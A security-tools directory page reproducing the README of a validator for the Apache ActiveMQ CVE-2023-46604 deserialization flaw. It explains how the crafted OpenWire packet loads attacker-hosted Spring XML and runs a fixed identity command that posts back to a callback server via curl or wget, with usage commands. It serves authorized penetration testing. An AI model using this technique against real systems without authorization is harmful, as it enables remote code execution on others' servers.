Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
ActiveMQ-CVE-2023-46604 — Non-destructive validator for Apache ActiveMQ CVE-2023-46604. Sends crafted OpenWire packets, uses HTTP callback server to confirm RCE or XML loading, and generates CSV/JSON evidence for authorized penetration tests. | Kitploit
Tools/GitHubGitHub/bhanunamikaze/activemq-cve-2023-46604
Vulnerability ScannersVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubbhanunamikaze/activemq-cve-2023-46604

ActiveMQ-CVE-2023-46604

Non-destructive validator for Apache ActiveMQ CVE-2023-46604. Sends crafted OpenWire packets, uses HTTP callback server to confirm RCE or XML loading, and generates CSV/JSON evidence for authorized penetration tests.

View Repository
281 month agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-46604 ActiveMQ Safe Validator

A single-file, non-destructive validator for Apache ActiveMQ CVE-2023-46604. It starts its own HTTP callback server, generates target-specific Spring XML in memory, sends the crafted OpenWire packet, correlates callbacks with unique tokens, and writes CSV/JSON evidence.

The project is designed for authorized penetration tests and fleet validation. It deliberately does not implement reverse shells, unrestricted command execution, CIDR expansion, persistence, or payload staging.

What the validator proves

Two fixed proof modes are available:

  • rce executes a fixed, read-only identity probe and returns its output to the built-in HTTP server. A callback confirms operating-system command execution in the ActiveMQ service context.
  • xml serves an empty Spring context. A fetch confirms that the crafted OpenWire message caused the target to instantiate ClassPathXmlApplicationContext and retrieve attacker-controlled XML, without starting a process.

No XML files need to be created or hosted separately.

Features

  • One Python file; standard library only
  • Built-in threaded HTTP server
  • Dynamic, per-target XML and callback tokens
  • Explicit single-target and multi-target input
  • Bounded concurrency and send retries
  • Plain OpenWire and TLS-wrapped OpenWire support
  • Fixed Linux and Windows identity probes
  • CSV evidence by default, optional JSON
  • Accurate result states that avoid false "not vulnerable" claims
  • CI-friendly --fail-on-vuln exit code

Requirements

  • Python 3.9 or newer
  • Network access from the testing host to the target OpenWire listener
  • Network access from the target back to the built-in HTTP callback address
  • Explicit authorization for every target

The default OpenWire port is 61616, but non-default ports are supported.

Quick start

Use documentation-only addresses in examples; replace them with your authorized assets.

Single Linux target

python3 activemq_validator.py \
  --authorized \
  --target 192.0.2.10:61616 \
  --callback-host 192.0.2.50

The script starts the callback server automatically on TCP/8000, serves the generated XML, sends the OpenWire packet, waits for evidence, prints a result table, and writes:

activemq-cve-2023-46604-results.csv

Multiple explicit targets

python3 activemq_validator.py \
  --authorized \
  --target mq01.example.test:61616 \
  --target mq02.example.test:61616 \
  --target tcp://192.0.2.23:61500 \
  --callback-host 192.0.2.50 \
  --workers 4 \
  --json-output results.json

Target file

Create targets.txt:

# One explicitly authorized host per line
mq01.example.test:61616
192.0.2.21:61616
tcp://192.0.2.22:61500
ssl://mq-secure.example.test:61617

Run:

python3 activemq_validator.py \
  --authorized \
  --targets-file targets.txt \
  --callback-host 192.0.2.50 \
  --http-port 8000 \
  --platform linux \
  --proof rce \
  --workers 8 \
  --wait 15 \
  --output findings.csv \
  --json-output findings.json

Target files may contain blank lines and comments beginning with #. CIDR expansion is intentionally unsupported; enumerate the authorized inventory explicitly.

Automatic callback-address detection

For simple routed networks, omit --callback-host:

python3 activemq_validator.py \
  --authorized \
  --target 192.0.2.10:61616

The tool selects the local source address used to route toward the first target. Specify --callback-host when testing through NAT, VPNs, containers, jump hosts, or multi-homed systems.

Windows-hosted ActiveMQ

python3 activemq_validator.py \
  --authorized \
  --target 192.0.2.30:61616 \
  --callback-host 192.0.2.50 \
  --platform windows \
  --proof rce

The Windows probe uses a fixed, non-interactive PowerShell command to return the service identity, computer name, and OS version. It does not provide an interactive shell.

XML-load-only validation

python3 activemq_validator.py \
  --authorized \
  --targets-file targets.txt \
  --callback-host 192.0.2.50 \
  --proof xml

This mode does not instantiate ProcessBuilder.

TLS-wrapped OpenWire

Use an ssl:// target:

python3 activemq_validator.py \
  --authorized \
  --target ssl://mq-secure.example.test:61617 \
  --callback-host 192.0.2.50

For an internal listener with an untrusted certificate:

python3 activemq_validator.py \
  --authorized \
  --target ssl://mq-secure.example.test:61617 \
  --callback-host 192.0.2.50 \
  --tls-no-verify

--tls-no-verify affects only the OpenWire TLS connection. The callback server is HTTP.

Result states

StatusMeaning
CONFIRMED_VULNERABLE_RCEThe target fetched its XML and the fixed identity command returned evidence.
CONFIRMED_VULNERABLE_XML_LOADIn xml mode, the target fetched the unique XML document.
VULNERABLE_XML_LOAD_ONLYIn rce mode, XML retrieval occurred but the command callback did not. The vulnerable class-instantiation path is confirmed; callback tooling, egress, or process execution may be restricted.
NOT_CONFIRMEDThe packet was sent, but no correlated HTTP evidence arrived before the deadline. This is not proof that the host is patched.
UNREACHABLEThe TCP/TLS connection or packet send failed.

A patched broker, an incorrect port, egress filtering, routing problems, TLS mismatch, and endpoint controls can all affect callback-based validation. Preserve the CSV/JSON timestamps and callback output as report evidence.

Fixed identity evidence

The Linux identity probe returns output similar to:

CVE-2023-46604 RCE CONFIRMED
uid=997(activemq) gid=997(activemq) groups=997(activemq)
user=activemq
host=mq01
os=Linux 5.15.0-...

It tries curl, wget, and BusyBox wget for the HTTP POST. If the XML is fetched but none of those clients is available, the result is VULNERABLE_XML_LOAD_ONLY rather than a false negative.

Exit codes

  • 0: validation completed, or vulnerabilities were found without --fail-on-vuln
  • 2: at least one vulnerable result was found and --fail-on-vuln was supplied
  • argparse errors use the normal non-zero command-line error code

Example CI usage:

python3 activemq_validator.py \
  --authorized \
  --targets-file targets.txt \
  --callback-host 192.0.2.50 \
  --fail-on-vuln

How it works

CVE-2023-46604 affects Java OpenWire unmarshalling. The validator sends a loose-marshalled OpenWire ExceptionResponse whose exception class is:

org.springframework.context.support.ClassPathXmlApplicationContext

The exception message is the unique URL of the generated Spring XML. Vulnerable ActiveMQ code instantiates the attacker-selected class with that URL. In rce mode, the Spring context starts a fixed ProcessBuilder probe; in xml mode, the context is empty.

Every target receives a different token, for example:

http://192.0.2.50:8000/poc/<unique-token>.xml
http://192.0.2.50:8000/cb/<same-token>

This allows concurrent callbacks to be attributed to the correct target.

Command reference

Download Tool